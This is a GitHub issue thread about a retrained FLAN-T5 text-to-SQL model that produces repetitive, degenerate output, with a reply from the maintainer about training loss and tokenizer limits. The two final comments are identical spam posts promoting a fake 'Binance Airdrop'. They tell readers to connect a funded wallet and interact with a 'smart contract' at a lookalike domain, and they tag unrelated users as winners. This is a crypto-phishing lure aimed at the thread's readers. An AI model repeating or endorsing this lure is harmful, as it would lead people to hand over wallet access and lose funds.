### ISSUE TITLE
Not getting correct results after training the model

### ISSUE THREAD

**Issue by gregoiresage** [juierror/flan-t5-text-to-sql#1]
Hello

I tried to replay your training script on my local python environement.
Everything seems to run correctly but when I call the inference I get completely strange results, abosolutely not the ones I get when I use the model you uploaded on huggingface

Example: 
```
question: Who is the director of the episode that corresponds to the total episodes number 14? 
table: ['Total#', 'Series#', 'Title', 'Writer', 'Director', 'Original air date']
model result: The director of the episode that corresponds to the total episodes number 14 is written by the writer and directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number 14 is directed by the director of the episode that corresponds to the total episodes number
real result: SELECT Director FROM table WHERE Total# = 14
question: what is id with name jui and age equal 25
table: ['id', 'name', 'age']
id with name jui and age equal 25 - id with name jui and age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal 25 - id with age equal
question: get people name with age equal 25
table: ['id', 'name', 'age']
get people name with age equal 25 table: id,name,age
```

Do you have any hints on what could be wrong ?
Have you used the exact same training parameters ?

Bye

**Comment by juierror** [comment]
Hello

If I remember it correctly, I use the exact same training parameter as show in the notebooks. This the training loss and validate loss on my side
![image](https://github.com/juierror/flan-t5-text-to-sql/assets/30374408/e87cab13-c7fb-498e-a953-e48877d8f697)

Not sure if the validate loss is similar with you or not.

To be frank, I'm not sure what could be wrong.

Another point worth to mention is that the `google/flan-t5-base` that I use is not support `<` token, so it cannot generate `<`, so it may not appropriate for the text2SQL task.
![image](https://github.com/juierror/flan-t5-text-to-sql/assets/30374408/f18ea958-0afa-4e84-90b5-4d43c236f73c)

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @xiaotdl, @marinhovinicius, @shouc, @gessichen, @Naixor, @xeqlol, @Pier39W

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @veces, @tzatter, @nik-suri, @magamongo, @lierchao1997, @austwide2020, @buzs
